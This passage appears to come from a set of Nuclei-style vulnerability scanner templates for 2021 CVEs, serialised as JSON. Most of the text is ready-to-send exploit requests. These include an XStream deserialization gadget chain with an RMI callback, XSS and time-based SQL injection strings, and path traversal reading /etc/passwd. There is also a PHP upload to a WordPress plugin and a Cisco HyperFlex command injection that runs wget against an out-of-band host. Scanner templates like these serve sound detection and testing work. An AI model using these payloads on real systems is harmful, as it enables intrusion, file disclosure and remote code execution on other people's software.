<javax.sql.rowset.BaseRowSet>\n                <default>\n                  <concurrency>1008</concurrency>\n                  <escapeProcessing>true</escapeProcessing>\n                  <fetchDir>1000</fetchDir>\n                  <fetchSize>0</fetchSize>\n                  <isolation>2</isolation>\n                  <maxFieldSize>0</maxFieldSize>\n                  <maxRows>0</maxRows>\n                  <queryTimeout>0</queryTimeout>\n                  <readOnly>true</readOnly>\n                  <rowSetType>1004</rowSetType>\n                  <showDeleted>false</showDeleted>\n                  <dataSource>rmi://{{interactsh-url}}/test</dataSource>\n                  <listeners/>\n                  <params/>\n                </default>\n              </javax.sql.rowset.BaseRowSet>\n              <com.sun.rowset.JdbcRowSetImpl>\n                <default/>\n              </com.sun.rowset.JdbcRowSetImpl>\n            </fPullParserConfig>\n            <fConfigSetInput>\n              <class>com.sun.rowset.JdbcRowSetImpl</class>\n              <name>setAutoCommit</name>\n              <parameter-types>\n                <class>boolean</class>\n              </parameter-types>\n            </fConfigSetInput>\n            <fConfigParse reference='../fConfigSetInput'/>\n            <fParseInProgress>false</fParseInProgress>\n          </m__incrementalSAXSource>\n          <m__walker>\n            <nextIsRaw>false</nextIsRaw>\n          </m__walker>\n          <m__endDocumentOccured>false</m__endDocumentOccured>\n          <m__idAttributes/>\n          <m__textPendingStart>-1</m__textPendingStart>\n          <m__useSourceLocationProperty>false</m__useSourceLocationProperty>\n          <m__pastFirstElement>false</m__pastFirstElement>\n        </m__dtm>\n        <m__dtmIdentity>1</m__dtmIdentity>\n      </m__DTMXRTreeFrag>\n      <m__dtmRoot>1</m__dtmRoot>\n      <m__allowRelease>false</m__allowRelease>\n    </value>\n  </javax.naming.ldap.Rdn_-RdnEntry>\n  <javax.naming.ldap.Rdn_-RdnEntry>\n    <type>ysomap</type>\n    <value class='com.sun.org.apache.xpath.internal.objects.XString'>\n      <m__obj class='string'>test</m__obj>\n    </value>\n  </javax.naming.ldap.Rdn_-RdnEntry>\n</sorted-set>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["timestamp","com.thoughtworks.xstream"],"condition":"or"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-34805","info":{"name":"FAUST iServer 9.0.018.018.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40969","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting (Reflected)","severity":"medium"},"requests":[{"raw":["POST /install.php?page=4 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsettingsform[firstname]=pdteam'+onclick='alert(document.domain)\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onclick='alert(document.domain)","Spotweb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-30175","info":{"name":"ZEROF Web Server 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /HandleEvent HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nAjax=1&IsEvent=1&Obj=O4F&Evt=click&this=O4F&\"_fp_=_S_ID=CteTYLjmYw108029DC1&O33=%020%02%02'&O37=%020%02%02fff\"&_seq_=2&_uo_=O\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["You have an error in your SQL syntax"]},{"type":"word","part":"header","words":["ZEROF"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20792","info":{"name":"WordPress Quiz and Survey Master <7.1.14 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=mlw_quiz_list&s=\"></script><script>alert(document.domain)</script>&paged=\"></script><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24498","info":{"name":"WordPress Calendar Event Multi View <1.4.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /?cpmvc_id=1&cpmvc_do_action=mvparse&f=edit&month_index=0&delete=1&palette=0&paletteDefault=F00&calid=1&id=999&start=a%22%3E%3Csvg/%3E%3C%22&end=a%22%3E%3Csvg/onload=alert(1)%3E%3C%22 HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><svg/onload=alert(1)><","Calendar Details"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24287","info":{"name":"WordPress Select All Categories and Taxonomies <1.3.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=moove-taxonomy-settings&tab=\"+style=animation-name:rotation+onanimationstart=\"alert(document.domain); HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"alert(document.domain)\")","contains(body_2, \"Set up the taxonomies\")"],"condition":"and"}]}]},{"id":"CVE-2021-29622","info":{"name":"Prometheus  - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/new/newhttp://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2021-41349","info":{"name":"Microsoft Exchange Server Pre-Auth POST Based Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /autodiscover/autodiscover.json HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n%3Cscript%3Ealert%28document.domain%29%3B+a=%22%3C%2Fscript%3E&x=1\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["alert(document.domain);","a=\"\""],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"word","negative":true,"words":["A potentially dangerous Request.Form value was detected from the client"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-45428","info":{"name":"Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET /{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n","PUT /{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n\nCVE-2021-45428\n","GET /{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_1 == 404 && status_code_2 == 201","contains(body_3, \"CVE-2021-45428\") && status_code_3 == 200"],"condition":"and"}]}]},{"id":"CVE-2021-20323","info":{"name":"Keycloak 10.0.0 - 18.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/auth/realms/master/clients-registrations/default","{{BaseURL}}/auth/realms/master/clients-registrations/openid-connect","{{BaseURL}}/realms/master/clients-registrations/default","{{BaseURL}}/realms/master/clients-registrations/openid-connect"],"body":"{\"Test<img src=x onerror=alert(document.domain)>\":1}","stop-at-first-match":true,"headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Unrecognized field \"Test<img src=x onerror=alert(document.domain)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2021-46068","info":{"name":"Vehicle Service Management System - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{username}}&password={{password}}\n","POST /classes/Users.php?f=save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid=1&firstname=Administrator%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&lastname=Admin&username=admin\n","GET /admin/?page=user HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_3, 'text/html')","status_code_3 == 200","contains(body_3, \"Administrator\\\"><script>alert(document.domain)</script> Admin\")"],"condition":"and"}]}]},{"id":"CVE-2021-36749","info":{"name":"Apache Druid - Local File Inclusion","severity":"medium"},"requests":[{"raw":["POST /druid/indexer/v1/sampler?for=connect HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"type\":\"index\",\"spec\":{\"type\":\"index\",\"ioConfig\":{\"type\":\"index\",\"firehose\":{\"type\":\"http\",\"uris\":[\" file:///etc/passwd \"]}},\"dataSchema\":{\"dataSource\":\"sample\",\"parser\":{\"type\":\"string\", \"parseSpec\":{\"format\":\"regex\",\"pattern\":\"(.*)\",\"columns\":[\"a\"],\"dimensionsSpec\":{},\"timestampSpec\":{\"column\":\"no_ such_ column\",\"missingValue\":\"2010-01-01T00:00:00Z\"}}}}},\"samplerConfig\":{\"numRows\":500,\"timeoutMs\":15000}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","druid:*:1000:1000:"],"condition":"or"}]}]},{"id":"CVE-2021-4191","info":{"name":"GitLab GraphQL API User Enumeration","severity":"medium"},"requests":[{"raw":["POST /api/graphql HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\nAccept: */*\nOrigin: {{RootURL}}\nReferer: {{RootURL}}/-/graphql-explorer\n\n{\"query\":\"# Welcome to GraphiQL\\n#\\n# GraphiQL is an in-browser tool for writing, validating, and\\n# testing GraphQL queries.\\n#\\n# Type queries into this side of the screen, and you will see intelligent\\n# typeaheads aware of the current GraphQL type schema and live syntax and\\n# validation errors highlighted within the text.\\n#\\n# GraphQL queries typically start with a \\\"{\\\" character. Lines that starts\\n# with a # are ignored.\\n#\\n# An example GraphQL query might look like:\\n#\\n#     {\\n#       field(arg: \\\"value\\\") {\\n#         subField\\n#       }\\n#     }\\n#\\n# Keyboard shortcuts:\\n#\\n#  Prettify Query:  Shift-Ctrl-P (or press the prettify button above)\\n#\\n#       Run Query:  Ctrl-Enter (or press the play button above)\\n#\\n#   Auto Complete:  Ctrl-Space (or just start typing)\\n#\\n\\n{\\n  users {\\n    nodes {\\n      id\\n      name\\n      username\\n    }\\n  }\\n}\",\"variables\":null,\"operationName\":null}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"data\"","\"users\"","\"nodes\"","\"id\"","gid://"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"json","json":[".data.users.nodes[].username"]}]}]},{"id":"CVE-2021-24931","info":{"name":"WordPress Secure Copy Content Protection and Content Locking <2.8.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=3)%20AND%20(SELECT%205921%20FROM%20(SELECT(SLEEP(6)))LxjM)%20AND%20(7754=775&type=json HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"{\\\"status\\\":true\")"],"condition":"and"}]}]},{"id":"CVE-2021-3377","info":{"name":"npm ansi_up v4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /\\u001B]8;;https://interact.sh\"/onmouseover=\"alert(1)\\u0007example\\u001B]8;;\\u0007 HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","words":["sh\"/onmouseover=\"alert(1)\">"]}]}]},{"id":"CVE-2021-24340","info":{"name":"WordPress Statistics <13.0.8 - Blind SQL Injection","severity":"high"},"requests":[{"raw":["GET /wp-content/plugins/wp-statistics/readme.txt HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 15s\nGET /wp-admin/admin.php?page=wps_pages_page&ID=0+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))test)&type=home HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_1 == 200","contains(body_1, \"WP Statistics\")"],"condition":"and"},{"type":"dsl","dsl":["duration_2>=7","status_code_2 == 500","contains(body_2, \">WordPress &rsaquo; Error<\") && contains(body_2, \">Your request is not valid.<\")"],"condition":"and"}]}]},{"id":"CVE-2021-43725","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting (Reflected)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?data[performredirect]=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&page=login"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\"><script>alert(document.domain)</script>","name=\"data[performredirect]"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31250","info":{"name":"CHIYU TCP/IP Converter - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/if.cgi?redirect=setting.htm&failure=fail.htm&type=ap_tcps_apply&TF_ip=443&TF_submask=0&TF_submask=%22%3E%3Cscript%3Ealert%28{{randstr}}%29%3C%2Fscript%3E&radio_ping_block=0&max_tcp=3&B_apply=APPLY"],"headers":{"Authorization":"Basic OmFkbWlu"},"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["\"><script>alert({{randstr}})</script>"]}]}]},{"id":"CVE-2021-34429","info":{"name":"Eclipse Jetty - Information Disclosure","severity":"medium"},"requests":[{"raw":["GET /%u002e/WEB-INF/web.xml HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n\n","GET /.%00/WEB-INF/web.xml HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</web-app>","java.sun.com"],"condition":"and"},{"type":"word","part":"header","words":["application/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40972","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /install.php?page=4 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsettingsform[mail]=pdteam'+onclick='alert(document.domain)\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onclick='alert(document.domain)","Spotweb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-34370","info":{"name":"Accela Civic Platform <=21.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=https://interact.sh/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2021-43496","info":{"name":"Clustering Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/img/../../../../../../etc/passwd"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-24862","info":{"name":"WordPress RegistrationMagic <5.0.1.6 - Authenticated SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=3)%20AND%20(SELECT%205921%20FROM%20(SELECT(SLEEP(6)))LxjM)%20AND%20(7754=775&type=json HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/custom-registration-form-builder-with-submission-manager/admin/js/script_rm_utilities.js HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration_2>=6","status_code_2 == 200","contains(body_3, \"rm_user_role_mananger_form\")"],"condition":"and"}]}]},{"id":"CVE-2021-29625","info":{"name":"Adminer <=4.8.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?server=db&username=root&db=mysql&table=event%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24169","info":{"name":"WordPress Advanced Order Export For WooCommerce <3.1.8 - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=wc-order-export&tab=</script><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<script>alert(document.domain)</script>\")","contains(body_2, \"woo-order-export-lite\")"],"condition":"and"}]}]},{"id":"CVE-2021-25114","info":{"name":"WordPress Paid Memberships Pro <2.6.7 - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET /?rest_route=/pmpro/v1/checkout_level&level_id=3&discount_code=%27%20%20union%20select%20sleep(6)%20--%20g HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/paid-memberships-pro/js/pmpro-checkout.js HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","contains(header_1, \"application/json\")","status_code == 200","contains(body_2, 'other_discount_code_')"],"condition":"and"}]}]},{"id":"CVE-2021-3223","info":{"name":"Node RED Dashboard <2.26.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd","{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2fsettings.js"],"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["Node-RED web server is listening"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-39320","info":{"name":"WordPress Under Construction <1.19 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php/\"><script>alert(document.domain)</script>/?page=under-construction HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["action=\"/wp-admin/admin.php/\"><script>alert(document.domain)</script>","under-construction"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40973","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /install.php?page=4 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsettingsform[lastname]=pdteam'+onclick='alert(document.domain)\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onclick='alert(document.domain)","Spotweb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24452","info":{"name":"WordPress W3 Total Cache <2.1.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=w3tc_extensions&extension='-alert(document.domain)-' HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, 'extensions/\\'-alert(document.domain)-\\'') && contains(body_2, 'w3-total-cache')","contains(header_2, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2021-44427","info":{"name":"Rosario Student Information System Unauthenticated SQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/Side.php"],"body":"sidefunc=update&syear=111'","headers":{"Content-Type":"application/x-www-form-urlencoded; charset=utf-8"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB Execute Failed. ERROR:","unterminated quoted string"],"condition":"and"},{"type":"word","part":"header","words":["RosarioSIS="]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-35250","info":{"name":"SolarWinds Serv-U 15.3 - Directory Traversal","severity":"high"},"requests":[{"raw":["POST /?Command=NOOP&InternalFile=../../../../../../../../../../../../../../Windows/win.ini&NewWebClient=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n/?Command=NOOP\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["\\[(font|extension|file)s\\]"]},{"type":"status","status":[401]}]}]},{"id":"CVE-2021-41648","info":{"name":"PuneethReddyHC action.php SQL Injection","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/action.php"],"body":"proId=1'&addToCart=1","matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["Warning: mysqli_num_rows() expects parameter 1 to be","xdebug-error xe-warning"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21402","info":{"name":"Jellyfin <10.7.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/","{{BaseURL}}/Videos/1/hls/m/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Content-Type: application/octet-stream"]},{"type":"regex","part":"body","regex":["\\[(font|extension|file)s\\]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21287","info":{"name":"MinIO Browser API - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST /minio/webrpc HTTP/1.1\nHost: {{interactsh-url}}\nContent-Type: application/json\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36\nContent-Length: 76\n\n{\"id\":1,\"jsonrpc\":\"2.0\",\"params\":{\"token\":  \"Test\"},\"method\":\"web.LoginSTS\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","words":["We encountered an internal error"]}]}]},{"id":"CVE-2021-21803","info":{"name":"Advantech R-SeeNet - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/php/device_graph_page.php?is2sim=%22zlo%20onerror=alert(1)%20%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"zlo onerror=alert(1) \"","Device Status Graph"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42567","info":{"name":"Apereo CAS Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /cas/v1/tickets/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=%3Cimg%2Fsrc%2Fonerror%3Dalert%28document.domain%29%3E&password=test\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["<img/src/onerror=alert(document.domain)>","java.util.HashMap"],"condition":"and"},{"type":"status","status":[401]}]}]},{"id":"CVE-2021-39322","info":{"name":"WordPress Easy Social Icons Plugin < 3.0.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php/</script><script>alert(document.domain)</script>/?page=cnss_social_icon_page HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24284","info":{"name":"WordPress Kaswara Modern VC Addons <=3.0.1 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php?action=uploadFontIcon HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=------------------------d3be34324392a708\n\n--------------------------d3be34324392a708\nContent-Disposition: form-data; name=\"fonticonzipfile\"; filename=\"{{zip_file}}.zip\"\nContent-Type: application/octet-stream\n\n{{hex_decode('504B03040A0000000000FA73F454B2333E07140000001400000006001C00')}}{{php_file}}{{hex_decode('555409000366CBD76267CBD76275780B000104F50100000414000000')}}{{php_cmd}}{{hex_decode('0A504B01021E030A00000000002978F454E49BC1591300000013000000060018000000000001000000A48100000000')}}{{php_file}}{{hex_decode('555405000366CBD76275780B000104F50100000414000000504B050600000000010001004C000000530000000000')}}\n--------------------------d3be34324392a708\nContent-Disposition: form-data; name=\"fontsetname\"\n\n{{zip_file}}\n--------------------------d3be34324392a708\nContent-Disposition: form-data; name=\"action\"\n\nuploadFontIcon\n--------------------------d3be34324392a708--\n","GET /wp-content/uploads/kaswara/fonts_icon/{{zip_file}}/{{php_file}} HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["wp-content/uploads/kaswara/fonts_icon/{{zip_file}}/style.css"]},{"type":"word","part":"body_2","words":["phpinfo()"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-1498","info":{"name":"Cisco HyperFlex HX Data Platform - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /storfs-asup HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\naction=&token=`wget http://{{interactsh-url}}`&mode=`wget http://{{interactsh-url}}`\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-28419","info":{"name":"SEO Panel 4.8.0 - Blind SQL Injection","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nCookie: _csrf={{rand_base(54,\"abc\")}};\n","POST /login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{BaseURL}}login.php\nCookie: _csrf={{rand_base(54,\"abc\")}};\n\nsec=login&red_referer=http%3A%2F%2F{{BaseURL}}&userName={{username}}&password={{password}}&login=\n","GET /archive.php?from_time=2021-04-25&order_col=(SELECT+7397+FROM(SELECT(SLEEP(3)))test)&order_val=DESC&report_type=website-search-reports&search_name=&sec=viewWebsiteSearchSummary&to_time=2021-04-25&website_id= HTTP/1.1\nHost: {{Hostname}}\nCookie: _csrf={{rand_base(54,\"abc\")}};\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration_3>=6","status_code_3 == 200","contains(body_3, \"Overall Report Summary\")"],"condition":"and"}]}]},{"id":"CVE-2021-41277","info":{"name":"Metabase Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/geojson?url=file:///etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-30213","info":{"name":"Knowage Suite 7.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/knowage/servlet/AdapterHTTP?Page=LoginPage&NEW_SESSION=TRUE&TargetService=%2Fknowage%2Fservlet%2FAdapterHTTP%3FPage%3DLoginPage%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24276","info":{"name":"WordPress Supsystic Contact Form <1.7.15 - Cross-Site 